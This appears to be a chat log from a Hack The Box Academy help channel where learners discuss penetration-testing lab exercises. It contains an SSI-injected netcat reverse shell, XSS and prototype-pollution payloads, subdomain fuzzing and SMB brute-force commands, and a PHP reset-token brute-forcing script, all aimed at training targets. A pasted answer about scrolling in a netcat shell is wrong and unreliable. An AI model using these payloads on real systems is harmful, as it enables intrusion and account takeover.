#modules

Hours later... that took 5 minutes after what you pointed me to (rewrote autogen.sh as suggested. Thank you again for the pointer on using the search!!

It happens

I ended up cheating my first time through footprinting module, using a gui email client bc I could not figure out the cli. Then went back and breezed through on a second go

Yeah this is my second go as well. It makes so much more sense this time.... i feel like I might actually understand most of this module.

Yeah this module was just boring to me tbh

goodnight i would like to kindly request some assistance in File upload attacks, specifically Blacklist

i’m not at my computer, but have you looked at phpinfo(); to verify system is allowed

@rustic sage no i have not will give it a go

Hi, anyone can help me with WhiteBox Attacks module? Please

I'm stuck in Privilege Escalation section

Think about what exactly is needed to be logged in as admin and then think about how you can "override" that

does anyone know what module is talking about?

Which module do they mention this in?

Broken Authentication

Hi! how you doing? Any hint on this?

how awesome is this OSINT Recon Module? 1000 boxes...

Because some of the fundamentals are advanced concepts

Which rely on some other base knowledge to get started

anyone sanity check on Broken Authentication - Skill Assessment?

i think im filtering properly but i dont find the way

Hey Everyone
I have an issue
LFI and File Uploads module
When i try upload shell.gif file i get nothing, form did'nt work
What can i do in this case ?

not completely disagree with this but the tier III modules i've so far do have a bit more fundamental then advanced stuff

after that part your wordlist should have about ||50|| or under

yea

i have 12

yea we need a bit more info than that for us to be able to help you

i have 11 users and 12 passwords

the python script i made up is working properly

so idk 🤷‍♂️

still not sure about this part but when i do this module when it first come out there was like 1 user which is the right one

try burp

what?

Can someone explain me how exactly, in context of unconstrained delegation attack, does the KUD-capable machine receives the TGT of the user that is trying to access it? Someone told me i think that it is being passed in the AP-REQ????

i just got this,i can't press upload button

but the part that you are on shouldn't be affect by that

im trying to get the valid user:pass to get in

enumerated users done -> got 11

filtered passwords done -> got 12

none of the combinations work

the cookie tamper is not working because i think there is a protection behind

also i used burp suite to analyze where request go, then i navigate to upload.php and get this error

i also got the cookie part if you are asking

this is how unconstrained delegation https://www.youtube.com/watch?v=xDFRUYv1-eU and for the attacks there should be some blog on thehacker recipes site

oh no there isn't

if this is the case you can skip user and get admin if not you still have to get user first

can i dm coz otherwise im gonna spoil something

sure

because you didn't bypass the filter

first which section are you on? and whay did you try?

Flie Inclusion LFI and File Uploads

here nothing about filter bypassing

i meant about image filters,only how to bypass directory traversel filters

the trick is turn off your brain and do the season, i got that rank without known for like a month or 2

also you know retired machine don't give you point right?

oh my bad give me a sec

oh i thought your main objective was to get the rank but this is way better

just have fun and don't try to get the ranks and soon you will get it

that box foothold is straight forward, haven't done it but i'll do it in a few day so if you are still stuck maybe i can help but i don't take that good of a note for boxes

ok for that section follow the Phar Upload part in that section

i get the same problem

anyone done Linux Privilege Escalation Logrotate recently?
I cant seem to find the standard configuration file /etc/logrotate.conf Do I need to reset the machine?

after uploading you access your shell the same way the section show right?

it's in backups/access.log

Do you mean the log that I need to rotate is the access.log?

yep

Do I need to do anything specific to get the log to rotate?

anyone can check me on the Broken Auth - Skill Assessment, i have the correct password and user list

Figured it out, Thanks MRTom for the directions

hi guys, i have a problem with the Introduction to Academy module, im stuck on the “Interactive Section with Target” section

have you tried interacting with the target?

the browser just doesnt connect

If you're using the in-browser vm then it doesn't have any internet access unless you buy some cubes

On my machine it works perfectly, I can search for the IP address, but on the VM it doesn't let me search for anything, I have tried searching for other domains like YouTube or Google, but it doesn't work

really? So how can I complete it?

Just use your own browser outside it or set up your own vm

Since you don't need any special tools to get the answer just look at the webpage

It's funny, because if I execute the command "ping google.com", for example, it works

The other bonus to buying any amount of cubes OR buying a subscription is that you get unlimited access

The internet access is highly limited

Like restrictively limited

But like I said the recommended thing is to set up your own linux vm and work off that rather than the browser

okay thank you very much!

I use the next payload: ||curl -x POST -d '{"proto": {"isAdmin": true}}' -H "Content-Type: application/json" http://IP:Port/login||

Is it wrong?

1. ||I register a new user||
2. ||I use the payload||
3. ||I enter as my user and try to access to the admin dashboard||
   4.||Nothing happen||
4. ||I feel sad :(||

Yo I'm doing XSS module, the first question, and I'm using the right payload but I get no popup. Idk if its a massive skill issue on my end am I missing smth? Even the example one they give to test for XSS just doesn't work. Confused :/

payload used ||<script>alert(window.origin)</script>||

shit jus don work men

nvm it was massive skill issue lol

Hey guys, im struggling with SockOverRDP section from pivoting module. The exercise tells us to RDP into 172.16.6.155 but when i try it i get an error, so i tried to rdp into 172.16.5.19 (thinking there was an error with ip the exercise) and i get the authentication prompt but login doesn't work.

Do u have an idea ?

Follow the pivoting steps exactly as described in the section

You go from foothold -> machine1 -> machine2

So no error in IP ?

I'll restart steps, ty 🙂

There is a middle ip to get to first

The question is the final ip destination

oowww

okay

You do have the credentials as well for that middle ip

Where you set up the proxifier tool

You have to load the socksoverrdp dll first

anyone with access to the broken auth skill assessment for a check?i have the correct lists of password and users but my python script says NO to every combination xD

Then your script sucks :^>

it is good

coz i solved it with burp

why cant i solve it with python

if it does the same

forgot a cookie or csrf or a missing header?

na i got the reason

you have to url encode the "."

URL encoding the wrong chars? have you tried looking at your queries through burp or wireshark

Welp that would do it

At least you figured it out

i hate urlencoded forms :/

why not just json all the way

Hello everyone!
Can someone help me, I am in "Attacking enterprise network" module.
Third question of this module giving me headache

"What is the FQDN of the associated subdomain?"

It's been 5 hour I can't find anything I am stuck.
First i tried nslookup, I thought it was inlanefreight.local but answer is wrong
I tried to zone transfer, brute forcing, subdomain enumeration I can't find anything. I even tried to enter any subdomain that I found. Still failed i need help

Google what a fqdn is, you're already told that it's related to the subdomain. So x.inlanefreight.local

Fully Qualified Domain Name

Inlanefreight.local is the overall domain

But it's being specific about the subdomain: so start there

I did it!

I already searched, I tried to read anything about FQDN, i thought it was monitoring or blog. But these are not answer. Last time i tried to enter any subdomain that i found. I used Namelist.txt, top 1 million 110000 wordlists to brute force then I try to enter anything that i found still failed

It's crazy i am missing something

associated subdomain might be another look into it

So it's directly related to what you're looking at

usually i use ffuf -w /usr/share/spiderfoot/spiderfoot/dicts/subdomains-10000.txt -u http://10.129.201.90 -H 'HOST: FUZZ.inlanefreight.local' -fs 46166 for subdomain enum, adjust per target

I already used ffuf and dnsenum tools

Found some subdomains but none of them FQDN

What was the outcome?

Should probably take to dms because spoilers

it was not the urlencode, i was little worried about that because in data sent via POST method you do not need urlencode

it was the "\n" character from each line

You're not wrong, UD configured machine will act on behalf of the user that has authenticated to it. It keeps a copy of the TGT stored in itself when a user requests for a ticket from the KDC, so that it can later request service tickets using the copy of the TGT and doesn't require the user to constantly having to request for service tickets.
So compromising the UD configured machine means you can access TGT stored when a user or machine account authenticates to it.

Im working on Windows fundamentals.
I have spun up the Windows target machine and connected to it via freeRDP, but i cant ping it or use smbclient to fullfill the task.
This is the error: (Error NT_STATUS_IO_TIMEOUT)
Either i didnt understand the exercise or im missing something else. Any advice?

Have you checked you're looking at the right share? smbclient -L //ip/ will list the available shares

smbclient -L //10.129.157.173/
do_connect: Connection to 10.129.157.173 failed (Error NT_STATUS_IO_TIMEOUT)

Restart the target

Or is the share even running

I tried restarting already.
How would I check if the share is running?

Idk follow the section step by step

I disabled the firewall, now it works as intended. Thank you

is it only me or every target spawn can't respond to anything for any section?

Are you connected to the vpn?

👍
So I made a little note on this topic which is basically a summary of a great video @MR.tom#1775 sent to me earlier. In case anyone wants to refresh this topic fast

• If in KRB-TGS-REQ KDC will notice that KDC-REQ-BODY -> sname contains a name of a service that has UAC THRUSTED_FOR_DELEGATION privilege, KDC will add enc-part -> EncTGSRepPart(encrypted with user session key) -> flags -> ok-as-delegate in TGS-REP
• If in the first KRB-TGS-REP the client notices enc-part -> EncTGSRepPart(encrypted with user session key) -> flags -> ok-as-delegate, the client will send a second KRB-TGS-REP request requesting a delegation TGT (TGT with KDC-REQ-BODY -> kdc-options -> forwarded)
• The server will reply with KRB-TGS-REP containing enc-part -> EncTGSRepPart(encrypted with user session key) -> flags -> forwarded flag and the copy of the TGT that will be used by the account with KUD privileges (delegation TGT)
• The client in the consequent KRB-AP-REQ will send not only the TGS for the service, but also "delegation TGT" (authenticator -> cksum -> krb-cred -> tickets), user session key associated with this delegation TGT (authenticator -> cksum -> krb-cred -> enc-part -> cypher -> encKrbCredPart -> ticket-info -> key), subkey to decrypt the aforementioned user session key (authenticator -> subkey)
• The service then uses aquired delegation TGT to make a KRB-TGS-REQ to KDC

yeah i tried with my kali machine and with the pwnbox but just nmap doesn't work

or it work for like 7 minutes

Well if you're running pwnbox and vpn at the same time it'll be funky

yeah not at the same time of course

Try changing vpn regions and downloading a new config

ok thanks i'll try

Is anyone able to help with the AD Module? Stuck trying to find the ObjectAceType of the forend user's rights over GPO management group.

What do I need to do to verify my account on HTB’s discord

read and follow #welcome

Hello, I apologize for bothering you, but I require assistance with the 'SSI Injection Exploitation Example' module. My reverse shell is not functioning. I've attempted to break it into three pieces, but unfortunately, it's still not working.
This is the RS: "<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->"

Does not work. Then, I broke it in 3 pieces:
<!--#exec cmd="mkfifo /tmp/foo" -->
<!--#exec cmd="nc 10.10.15.199 9090 0</tmp/foo | /bin/bash 1>/tmp/foo" -->
<!--#exec cmd="rm /tmp/foo" -->
No sucess

<@&861185840277487616>

that copycat forum was so (r word)ed i'm not even sure if it's a serious rule break

sure which section?

Got it, thanks tho!

helllo guys im back

Hii

after a two days break

strating Active Directory Enumeration & Attacks wish me luck

<@&861185840277487616>

No no

I have no evil intentions

Only

I was curious

Sorry

this channel for education purpose

Read #welcome and #rules

Right now whenever I try to start instances in Academy I get "There are no available instances. Please try again later.".

neither it's working for me

Sorry, I was not online the whole day.
If you still need help, send me a DM

Hi payloadbunny, have you tried the cdsa path?

I am almost done with it

what do you think?

The path is great, but I need more training. I am not a logfile mole yet

did you start with it too?

i cant open my pwnbox "there are no available instances. please try again later." but i am paid member😭

Errors happen, even to paying customers 🤷‍♂️

I'm p2w and I have the same issue

im doing the basic LFI module and whenever i try and read /etc/passwd it just hangs?

Just finished Server-side Attacks module and I'm not sure I did the final assessment correctly =/ Was I supposed to look for something on port 8080? I simply found a JS script, got the link from it

weird, it works on pwnbox but VPN just hangs

Try to change the VPN Region

I have had alot of success with this command: sudo ifconfig tun0 mtu 1200

or maybe its mtu tun0?

try both 😄

has been working for fine for months on other modules, so will have a look if the problem continues

thanks guys

Hi, got issue with crackmapexec in kali 2023 , it echo nothing with smb bruteforce

anyone know about it ?

can't send image here

just dropp the output of the cmnd

also read and follow #welcome , and let us know what module/section you're working on

it's output nothing

literally

Does anyone know of AI thats used for cyber security type things ? Like an AI assistant that in real time analyzes what your doing and gives information, tips, possible infection strategies etc

can you copy past the cmnd u used

btw guys what is ur review about this module what is the best part and where i need to pay a lot of attention

what module?

No one can help without knowing what command you used and what you're trying to do

ACTIVE DIRECTORY ENUMERATION & ATTACKS

u can dm me with screen shot

and i ll put it here if u want

I don't know what to tell you, pretty much everything in that module is important

crackmapexec smb -i 10.10.10.184 -u users.txt -p pass.txt

i agree with @hallow kiln everything is important (obviously)

i'm actually redoing that module now since i've finished the path🤷‍♂️

crackmapexec doesn't use an -i flag for the IP

feel like there were a few things brushed over (looking at the command cheat sheet) that might come in handy

feel so awkward

thank you guys

this is the reason

you could have googled it, just a tip

yes tried a lot ,but just thought would be software or env error

I mean if you run the command, it says "crackmapexec smb: error: the following arguments are required: target" which points you in the right direction

another thing is to use the help menu

that is so smart btw

Imagine using a tool's -h flag or man <tool>

tried but missed 😅

why would i do that when i can just chatgpt it🤪 (sarcasm)

unheard of

Very cringe

Is there any way to make the RDP connection more consistent over the vpn? I keep getting failed logins/kicked off mid session

Says the one currently playing cs2

I'll have you know I tried to close it and it won't close

Using the tcp vpn download instead of udp

Thanks dood

😭

It won't even let you force it closed via task manager tho?

hey guys I really cant understand how to do this Can some one help me plz

Haven't tried, gonna hop back on after work teehee c:

I really dont know what should i do to see the Ajp

Also, not sure if I am being a doofus but I'm on Academy and don't see an option to get a TCP vpn connection

click on your profile (top right), click vpn settings

Very swag indeed

thanks

Well considering its saying replicate the steps shown in this section, start there

?

Does anyone know another place to download proxifier? It seems like the og website is not working

not working

https://www.proxifier.com

Thanks man 🙂

Oh wait

that doesn't work for me

It's fine I figured it out anyway, cheers though

Hi Guys. I am facing some problems with the module Windows Event Logs. Have anyone completed that module ? I might have few questions from them regarding identification of the PRINT Folder access

Hello guys! Im in the final part of the Python3 introducroty module! Anyone has done it already?!?

HEY GUYS does anyone know if there are any videos for linux fundamentals which actually read all the modules?
I searched for some over youtube but I couldn't find..

?

read them by yourself maybe

I just understand things better when i hear them 😅

you gonna work that out

otherwise you are lost in cybersecurity

to be fair, there's plenty of videos out there on topics ranging from the basics to more advanced stuff, but also an insane amount of material to read through

in any case, you may find some modules on YouTube, but it's not allowed to post anything above Tier 0, so you'll be back to reading after

if you want video courses, go for TCM, HTB is all reading, all the time

(Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer

I saw the footprinting-wordlists.txt, but to no avail.

Anyone got ideas?
I am completely out.

what have you done so far?

Well, the first task.

Or you mean done so far in terms of progress on the 2nd?

progress on the 2nd, what did you try

smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.187.234
smtp-user-enum (with wordlist)
Auxiliary with nmap.

I found the smtp-enum-users, but I have no idea if that'll help.

Did the open-relay -v as well.

did you try with the wordlist from the module?

Yep, footprinting-wordlist.txt

0 results.

tbh I do remember having some issues with that section, what ultimately worked for me was Metasploit's smtp_enum module with the module wordlist

https://gyazo.com/d9d4ef6d1540e63e3d15e4a98896bf22

Oo. Well, let me try it then.

Thank You for the advice, kind sir.

hope it works

Hello, I'm trying to do the Guided Lab for the Active Directory module and when I attampt to RDP into the target machine, I just get a black screen. Any thoughts and is the target actually accessible?

Wait, so smtp enum with footprinting.wordlist?

yep

Hm, aight,will try.

make sure to set the file path to the list correctly in metasploit

which section was that?

When you a get a black screen, just hit ENTER and most likely the isse will be solved

I had one machine that did that, had to use remmina

https://tenor.com/view/cant-thankyou-enough-gif-25170543

no way to know what's in the works

" Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer." anyone have clue for this? " Windows File Transfer Methods
under file transfer module

i tried to use curl with ftp and also http but it doesn't work

I am stuck in the last question in Skills Assessment - WordPress , I've tried password attack and searchsploit for plugins . I didn't find anything interesting , any hint ?

Could someone give me a hint for the second question Skills Assessment: Using Crackmapexec?

i think i done it a bit differently but not sure i am right or not. i download the file in my kali machine then i RDP to the target first. next, I download the file from kali

hello. can anyone help me on the Zap section for the Web Proxies module? I think I got the right cookie but when I resend it, there is no flag in the body and the cookie reverts back to the original one.

nevermind its there

I just had to scroll down some wow

You got the user?

have u tried to google de question?

my brain just went boom after SSRF example

is that a docker inside the target?

http://<TARGET IP>/load?q=http://127.0.0.1:PORT in this schema isn't PORT 80 the same port where is the web app under <TARGET_IP>

?

http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/ here internal.app.local is a web app under a docker instance right? otherwise im not understanding

https://academy.hackthebox.com/module/145/section/1298

I mean 1. youre specifying a different port there so yeah thats a different service and 2. even if that wasnt the case, vhost redirects can be at play

but in the 1st q= parameter if i place 127.0.0.1:80 i will get the same resource that is under http://<TARGET_IP> right?

Usually you should. but vhost/url_rewrites can do funky stuff

so id never say never for that

and in the 2nd q the 127.0.0.1 has to be a different network in this case?

Trying to understand how a Fundamentals level Academy has a super simple but challenge breaking JS bug in one of the steps and then the next step says that it seems the page's exercise is broken when it's not.

https://academy.hackthebox.com/module/35/section/223

https://academy.hackthebox.com/module/35/section/247

also when you get the RCE you are inside a docker container

the server should hit the same listening service. but it could just be an apache proxy or such ya know

with ip 172.17.0.3

woah

thats just one example

yea

a strange one

bit confusing

where is the best place to send bug reports?

another could be if the backend SSRF is sending the requests to an entirely different service in which case 127.0.0.1 would be the IP of the internal server, not the public one anyways.

wdym bugs?

which would be more common for say microservices type stuff

Message support on the website

they used window.onload instead of document.onload in the challenge for https://academy.hackthebox.com/module/35/section/223

thx @thorn urchin

it's not valid js and doesn't cause the page to perform it's second get request so that the flag can be discovered via the documentation

I had to find the error log in the console and then navigate to the flag's txt file that should have been rendered onload()

you do not

I will drop a note to support though, thanks Marcie

xD

If you're looking to suggest a change with what you think and can prove should work #858470491676737536

i got it like the exercise tells

window.onload is valid js

what browser youre using

use another browser

i think firefox can be weird sometimes

hmmm, when I searched it up I was finding some stackexchange comments saying it wasn't and didn't push it further, I was using Opera GX so hmm

let me go double check my stream, I clipped it

weird opera is chromium-based

i used Edge which also is

Opera GX might as well be an obscure browser though

Yeah opera can be 50/50 sometimes

wasnt that the gamer browser?

GamerTM

haha too much lights for me

It's an alright browser

yes

Easy customization

sorry, the script uses "document.onload()"

as we said try other browser

Yeah

It's a browser skill issue

HAHAHA

yes I will, but I misspoke, is document.onload valid? the SE comments I found said it had to be executed on an element of the page

Hi guys🫃

Yes

when they changed it to tier 2 ?

firefox:

but it works

Wrong channel read #welcome

it is not saying 404 now

chrome:

reload your target idk

it is working for me

yeah but the second get request doesn;t happen

you can find the text file, so did I

does not happen for YOU

but it's supposed to execute a get request

is not a bug

since it isn't happening for others

its a bug when it happens for everyone

you're not following the excersize, it's ok

I'll send to support

i have it done

as i showed you the 2nd GET request is done

XD?

Always was afaik

it was tier 3 and it still give back 100 cube , I guess

Interesting, I remember it being tier 2 but you might be right! I unlocked it, need to do it still though

have fun

lol bugged?

that is 100 free cubes 🤣

4 students

Tier 3 does in fact refund 100 cubes

¯_(ツ)_/¯

They maybe forgot to update c00b rewards for it

we won’t say

Shuuut be silence dude

Lol

¯_(ツ)_/¯

It's honestly arbitrary

sry had to jump into a meeting but I can;t argue that I'm seeing a second get request and the flag in the response body in chrome so I will play around with it a little bit more for my own understanding

thanks for your insight!

Yeah they changed it to tier 2 a few days ago I noticed
It’s probably because since they decide to add it to the new soc fundamentals path, so they had to downgrade it to tier 2 for silver annual / students 🤣

sometimes things get buggy

and yeah I'd consider Opera to be a bit obscure but it's handy to split tunnel VPN with while I stream without impacting my whole system and I wanted to test them out again since they seem to be marketing directly to the gamer crowd and their cpu and ram limiting features seem useful to a tab whore such as myself

I hope they keep the 100 cube x)

It'll probably be updated in 20 business days

Hi All
Someone can help me with Logrotate in Linux Privilege Escalation?

Ask the question/be more specific with the issue your having

I done everything from the text and is not working for me

not sure also why in this machine there is no /etc/logrotate.conf

I find this /snap/lxd/24918/etc/logrotate.conf
/snap/lxd/23889/etc/logrotate.conf
but it looks different

Hi all,
I am working on the following module: https://academy.hackthebox.com/module/144/section/1256

I am stuck on the second question at the moment: Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.

I don't really understand fully what DNS zones are or how to find them -- on my way to find them I was trying to both nslookup and dig the nameserver domain (ns.inlanefreight.htb) but I don't understand why what im doing isnt working.

I am trying to run nslookup ns.inlanefreight.htb -type=any -query=AXFR, however it keeps telling me that the connection to the domain failed, saying it timed out. However, when I replace the query with NS, or dont provide and specific query it works fine. I have verified that I can ping inlanefreight.htb and ns.inlanefreight.htb, as I have entered these into my hosts file.

Anyone able to provide a little bit of help? Also, I don't understand DNS' inner workings all that well (the records) so it may seem a little stupid haha

I got somewhere by running nslookup -type=any -query=AXFR inlanefreight.htb [SERVER IP]
however, when I try to run the same command but replacing inlanefreight.htb with ns.inlanefreight.htb, it gives me a 'notauth' error server can't find ns.inlanefreight.htb: NOTAUTH

Any ideas here? Im pretty stumped

please help link references

get lost

module chat isnt the place to spam a referral link, even(especially?) a htb referral link

english please

this channels is for HTB academy modules read #welcome and #rules after that use /verify at #bot-commands and ask that at #challenges

The challenge is in spanish, can someone help me please?

if that "challenge" isn't from hackthebox then just don't ask here to take it to #general

Do you know where can I ask? 😭

follow this

Hello everyone, please help me solve Skills Assessment - File Upload Attacks I read the upload file and the second where the extensions were written which are on the white list, but I can't upload the file I tried to create with the bash script all the extension. Once I managed to upload a file using png, but nothing worked and I know that the script changes the file name to the date, which can be viewed through burb. Please write. Not personally

Hi Anyone got the idea on how we can purchase cube in academy? (I have added my credit card) But on purchasing the cubes or subscribing it is giving Charge Failed error. There are options like redeeming Voucher, where can I purchase that?

Hello everyone, please provide me with some guidance about the skills assessment for vulnerability assessment, the final openvas part doesn't quite work because i couldnt get openvas to install even following all the steps on my own parrot os machine. everytime i install it, it tells me that i'm missing openvas scanner any idea?

Message support on the website tbh considering this is dealing with your PII and sensitive info

The assessment provides you a box to rdp to that has prepopulated scans if I recall

Sorry not rdp

Connect via browser

yes i opened the browser box, but it doesn't have gvm or openvas preinstalled, when i attempt to install those tools, it tells me that (The following packages have unmet dependencies:
redis-server : Depends: redis-tools (= 5:6.0.16-1+deb11u2) but 5:7.0.10-1~bpo11+1 is to be installed
E: Unable to correct problems, you have held broken packages.)

do you have any pointers? I have a difficult time with DNS, so I really don’t understand what to try next; I tried reviewing the lesson but I didn’t find anything that I didn’t already try

Sir you're misunderstanding

The IP that is from the spawn target has the open-vas installed

Zones are the ones that have SOA entry

ah my apologies, i got it

You connect via browser at https://ip:8080

thank you!

the actual target is described in the question

So an SOA entry is like a link to another DNS server (zone)? I’m having trouble fully understanding zones

I'd recommend using the pre-populated scan data as it can take forever to actually do the scan

ok thanks!

Everything can be answered from there, navigating the ui can be a pain tbh

SOA stores information about a zone. Each zone has exactly 1 SOA record. You can watch some youtube videos about DNS and zone transfer to understand it better

Tbh the modules that include dns stuff don't really go too in-depth with it

Hi guys, need some help. I am currently looking into reverse shell using netcat but when I connect to it and try to view any type of file I cannot scroll up in the terminal to view the output of a command like when I try to run the LinEnum script I cannot scroll up in the terminal to view the outputs of the scan i tried using python pty shell but its still the same

and how do I stop a process without killing the shell?

have you tried redirecting the output to a file

To scroll up in the terminal when using reverse shell using netcat, you can use the following command:

stty -ixon
This will enable the XON/XOFF protocol, which allows you to control the flow of data between the terminal and the remote host. To scroll up, you can press Ctrl+S to stop the output of the command, and then press Ctrl+Q to resume the output.

To stop a process without killing the shell, you can use the following command:

disown
This will remove the process from the shell's job list, so it will continue to run even if the shell exits.

Here is an example of how to use the stty and disown commands:

$ nc -lvp 4444
listening on [any] 4444 ...
connect to [any] 4444 (stdin is a tty)
whoami
root
To scroll up and view the output of the whoami command, you can press Ctrl+S, and then press Ctrl+Q.

To stop the whoami command without killing the shell, you can press Ctrl+Z, and then type disown.

Here is an example of how to use the python pty shell to scroll up and view the output of a command:

Python
import pty

def shell():
master, slave = pty.openpty()
os.system('stty -ixon < {}'.format(slave))
p = subprocess.Popen(['bash'], shell=True, stdin=slave, stdout=slave, stderr=slave)
while True:
data = os.read(master, 1024)
if data:
sys.stdout.write(data)
sys.stdout.flush()
else:
break
os.close(master)
os.close(slave)

shell()
Use code with caution. Learn more
This will create a new shell session and enable the XON/XOFF protocol. You can then run any command you want, and you will be able to scroll up and view the output.

To stop the shell session, you can press Ctrl+Z and then type exit.

i think bro just wants to scroll up

you can redirect the output to a file then view that file using the more or less command

Hi, i'm doing the IPMI module of Footprinting and i'm having problems finding the cleartext password. I run the command using "scanner/ipmi/ipmi_dumphashes" and i found only the username and the hash but not the cleartext password like in the example in the module. I tried cracking the hash with hashcat but every time i run the msf "run" the hash change. Can anyone give me a hint?

Identify the hash type and Crack it that way don't use the ?1?1?1?1?1 mask

Can anyone help me with the AERO machine please?

You're not gonna get cleartext, you're gonna have to crack it

#boxes

thanks

i tried to identify it with hashid but it says unknown hash if i use the entire of it , however if i use only the part after the ":" i got it

So run hashcat against that using the provided wordlist from the module

and cracking it gives me "exhausted" response

Also make sure you're using the right hashcat mode

it is

SHA-1 is mode 100

Actually rockyou works

Wrong hadhcat mode

You need to use the ipmi mode...

ohhhhhhh

im so dumb

ahahahah

7300

thx

You can also google

Thanks i got it

SELECT * FROM titles WHERE emp_no > 10000 OR title =! 'Engineer'; is answer

From this sentence it indicates me the answer to know how many records are not engineers.

from that sentence i get the correct answer 🤷🏻‍♂️

note to use NOT LIKE in uppercase since it is MariaDB

Good morning all, would anyone mind helping me with the pivoting lab? I am stuck on the first pivot, meterpreter has tried to spawn over 200 shells and it doesn't seem to be stopping any time soon.

Nevermind I got it, payload was set wrong on meterpreter

For the question "SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts. " in the 'Bind Shells' section(https://academy.hackthebox.com/module/115/section/1105),
now that I ssh into my target, bind to a shell and connected to a netcat listener , not sure why I am unable to excecute any linux commands. I of course would execute linux commands to find the flag.txt file.

Because you didn't properly create a bind shell

See the part : binding a bash shell

The section does walk you through creating and executing the bind shell

Could someone give me a hint for the second question Skills Assessment: Using Crackmapexec?

Hey anyone here that can help with Skill Assessment II for Attacking Common Applications? I'm stuck post Gitlab registration looking for the 3rd VHost

0 idea how i can help you here without spoiler so shoot me a dm if you still need help with that

Okay. So I ssh into the target command, issued a payload command like the one in the example it says 'permission denied' and they didn't show what permissions you needed in the bash shell section they used in the examples.

Try without sudo

Also change the port

You're trying to bind to a reserved port which requires sudo to do

You can do 8080

Or some other higher numbered port but iirc the first 1024 ports are reserved requiring sudo to override

Okay , I tried it without sudo(thas why I initially used sudo) before and got the same issue. Now I am gonna try port 8080

Your sudo isn't on the nc command btw, every semicolon is a new command

global _start

section .text
_start:
mov rax, 2
mov rcx, 5
loop
imul rax, rax, 2 ; multiply rax by itself
loop loop ; decrease rcx and repeat the loop

; After the loop ends, the value of rax will be 2^5, that is 32.
; The hex value of rax is 20.
This corrected code will loop the "loop" tag 5 times and at the end the value of rax will be 2^5 which is 32. The hex value of rax is 0x20. but it says the answer is wrong . Edit the attached assembly code to loop the "loop" label 5 times. What is the hex value of "rax" by the end?

i feel soo stupid that i can't even finish 100% Introduction to Academy im in the interactive section with target and i can't even figure out how connect to the target website

once I am in the target machine, I don't need any root permissions right? To find the flag.txt that I need to find

Correct

can someone help

That's the one where they give you ip:port yeah?

yep

Have you tried using a web browser?

i used htb's vm, my running vm, and my actual pc

ahem think more critically about what I said

I'm not saying using the pwnbox

I'm saying literally use a web browser

Can anyone help me?

i tried a bunch of ways but right now i typed it without the http:// and it worked

i feel stupid rn

Hello everyone, please help me solve Skills Assessment - File Upload Attacks I read the upload file and the second where the extensions were written which are on the white list, but I can't upload the file I tried to create with the bash script all the extension. Once I managed to upload a file using png, but nothing worked and I know that the script changes the file name to the date, which can be viewed through burb. Please write. Not personally

who can help for this "BROKEN AUTHENTICATION-Predictable Reset Token"

Hint : Read the source code of upload.php using (limited file upload) section. which give you the complete idea about how the file upload works

I read it

Go through code again, See the uploaded directory, format of file saving and finally the whitelisting.

can you help me

Which module ?

BROKEN AUTHENTICATION-Predictable Reset Token

what do hoy need

you*

Sorry, Have not started the module.

you just have to use the given (modify it) python script

The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug.

that is all you need

ok thanks

I do it

but the result are all error

do it better

i can send you my solution if you want but nothing more i can do

I've been reading this code for 3 days, I understand that it prohibits the expansion of php files and I understand that it adds a date before the file name

can share the screenshot in DM

i can help you in like 30min if u want

Please write to me in DM because I'm leaving for work right now

i am ready

#boxes

it says, "No Access". can you tell me whats this?

go over to #welcome verify your account to access other channels

I'm at work now, you can answer in DM

can anyone give me a hand on the LFI Skills assessment,

||I have got the admin page and the log variable and when i try to run anything with the log variable from the index.php or admin page i get nothing returned||

Hey DM me

Module: Attacking Common Applications
Section: ColdFusion - Enumeration and Discovery

Question: I can't use my browser to navigate to IP:5500 as detailed in the module. I see the note in the module that says the VM may take up to 90s to load, but it's been way longer than 90s and I still get a timeout message whenever I try to access the target. I can ping the target just fine.

I have this problem on both PwnBox and my Kali VM

I have been doing this

Thanks I will try this now

Hey there, I'm doing the Broken Authentication-Path in the academy.
Atm I'm stuck at the first "Predictable Reset Token" Excercise.

1. I created a token on the Website.
2. I copied the hash and the date of creation.
3. Then i created the php script that will run the hashing function on the 'htbuser' -> that i can verify my cript is working.

||<?php
function generate_reset_token($username, $timestamp) {
$token = md5($username . $timestamp);
return $token;
}

$knownUsername = "htbuser";

// Loop through timestamps within the range
$timestamp = strtotime("2023-10-04 02:22:34pm");
for ($i = -3000; $i <= 3001; $i++) {
$timestampMilliseconds = intval($timestamp * $i);

$generatedHash = generate_reset_token($knownUsername, $timestampMilliseconds);
echo "Generated Hash: " . $generatedHash . "\n";

}
?>
||

The script has a tolerance of +-3 seconds but i still can't get the correct hash. I have seen a lot of same problems in the forum but i found no solutions to the problem.

Any advice?

The way you generate the timestampmilliseconds seems off

Why are you multiplying

I used the function from the acadamy:

<?php
function generate_reset_token($username) {
  $time = intval(microtime(true) * 1000);
  $token = md5($username . $time);
  return $token;
}

And I use *3000 to specify a +- offset value of the timestamp in milliseconds

That multiplied by 1000 to get to milliseconds from seconds, you want to do that and then also add -3000 to +3000 to get all values in the timeframe

But if you multiply the time stamp with -3000 or 0 you get numbers that are completely off

||
<?php
function generate_reset_token($username, $timestamp) {
$token = md5($username . $timestamp);
return $token;
}

$knownUsername = "htbuser";

// Loop through timestamps within the range
$timestamp = strtotime("2023-10-04 03:26:53pm");
for ($i = -3000; $i <= 3001; $i++) {
$timestampMilliseconds = intval(($timestamp + $i) * 1000);

$generatedHash = generate_reset_token($knownUsername, $timestampMilliseconds);
echo "Generated Hash: " . $generatedHash . "\n";

}
?>
||

Changed the function, but still with wrong output 😦

Looking for the hash:

You now add -3000 to 3000 seconds to the time stamp and then make it into a millisecond number

But you want to make the time stamp into a millisecond one and then add -3000 to 3000 milliseconds

OMG

now i got it thanks!

Sometimes I make life difficult for myself 😄 time to catch a break

